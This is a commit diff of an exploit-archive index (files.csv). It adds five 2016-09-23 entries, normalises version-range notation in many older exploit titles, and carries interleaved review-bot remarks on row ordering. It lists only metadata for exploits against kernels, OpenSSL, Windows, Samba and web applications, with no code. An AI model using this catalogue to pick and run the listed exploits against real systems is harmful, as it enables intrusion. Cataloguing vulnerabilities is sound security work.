DB: 2016-09-24
5 new exploits

EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion
EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion

WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection
WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)

Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)

Adobe Acrobat Reader 7<9 - U3D Buffer Overflow
Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow

Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)

Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)
Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)

Adobe Flash - Crash When Freeing Memory After AVC decoding
Adobe Flash - Video Decompression Memory Corruption
Linux - SELinux W+X Protection Bypass via AIO
Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation
Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation

Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service
Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service

Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities
Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities

Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass
Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass

Microsoft Excel 95<2004 - Malformed Graphic File Code Execution
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution

Git-1.9.5 - ssh-agent.exe Buffer Overflow
Git 1.9.5 - ssh-agent.exe Buffer Overflow

Skybox Platform <=7.0.611 - Multiple Vulnerabilities
Skybox Platform <= 7.0.611 - Multiple Vulnerabilities

SOLIDserver <=5.0.4 - Local File Inclusion
SOLIDserver <= 5.0.4 - Local File Inclusion

WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities
WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)

Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
parent 12047d93f1
commit 102574cb3e
6 changed files with 179 additions and 21 deletions
files.csv (47 changes)
@ -3765,7 +3765,7 @@ id,file,description,date,author,platform,type,port
4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0
4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0
4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port
5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0
5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0
5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
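Review bot: the rewrite of 5127 from "1.10-1.11" to "1.10 < 1.11" turns an inclusive range into what reads as a strict upper bound, while the EVA-Web row in this same commit spells an inclusive range as "1.1 <= 2.2". The neighbouring 5126 row already uses "2.0 < 2.1", so the "<" form is clearly the index convention for "A through B"; either use "<=" here for an inclusive range or state that convention somewhere the CSV consumers can see it.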
@ -5252,7 +5252,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local,0
@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0
@ -5349,7 +5349,7 @@ id,file,description,date,author,platform,type,port
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0
5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0
@ -8947,7 +8947,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9238,7 +9238,7 @@ id,file,description,date,author,platform,type,port
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@ -9256,7 +9256,7 @@ id,file,description,date,author,platform,type,port
9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0
9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0
9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7<9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Buffer Overflow",2009-10-29,Dr_IDE,windows,local,0
9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
@ -9332,7 +9332,7 @@ id,file,description,date,author,platform,type,port
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0
9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0
9949,platforms/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
@ -16316,7 +16316,7 @@ id,file,description,date,author,platform,type,port
18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps,0
18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos,0
18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos,0
@ -18317,6 +18317,7 @@ id,file,description,date,author,platform,type,port
21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0
21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0
21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0
40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0
21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0
21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0
21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local,0
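Review bot: the new 40421 row is spliced in between 21015 and 21016, although this region of files.csv is ordered by id (the context rows run 21012, 21014, 21015, 21016, 21019, 21020). Placing new entries at their id-ordered position keeps lookups by id predictable and makes a daily update one contiguous hunk instead of one hunk per inserted row.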
@ -18329,6 +18330,7 @@ id,file,description,date,author,platform,type,port
21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0
21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@ -18393,6 +18395,7 @@ id,file,description,date,author,platform,type,port
21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0
21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0
21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify - Buffer Overflow",2001-09-03,foo,hp-ux,local,0
40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0
21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0
21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0
@ -18438,6 +18441,7 @@ id,file,description,date,author,platform,type,port
21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0
21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",multiple,remote,0
21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0
@ -18506,6 +18510,7 @@ id,file,description,date,author,platform,type,port
21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0
21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0
21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0
40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0
21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote,0
21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0
21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0
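Review bot: same ordering concern as with the other 2016-09-23 rows added by this commit (40421, 40420, 40419, 40418): 40417 is inserted between 21214 and 21215, in a block of 2002 entries. One id-ordered insertion per new row would keep the file sorted and avoid scattering a single day's update across five unrelated hunks.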
@ -18764,7 +18769,7 @@ id,file,description,date,author,platform,type,port
21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,php,webapps,0
21479,platforms/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,php,webapps,0
21480,platforms/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,cgi,webapps,0
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
21482,platforms/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos,0
21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0
21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
@ -19485,7 +19490,7 @@ id,file,description,date,author,platform,type,port
22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
@ -23911,7 +23916,7 @@ id,file,description,date,author,platform,type,port
26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0
26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
@ -24216,7 +24221,7 @@ id,file,description,date,author,platform,type,port
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95<2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0
@ -34693,7 +34698,7 @@ id,file,description,date,author,platform,type,port
38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0
38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0
38335,platforms/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0
38336,platforms/windows/dos/38336.py,"Git-1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
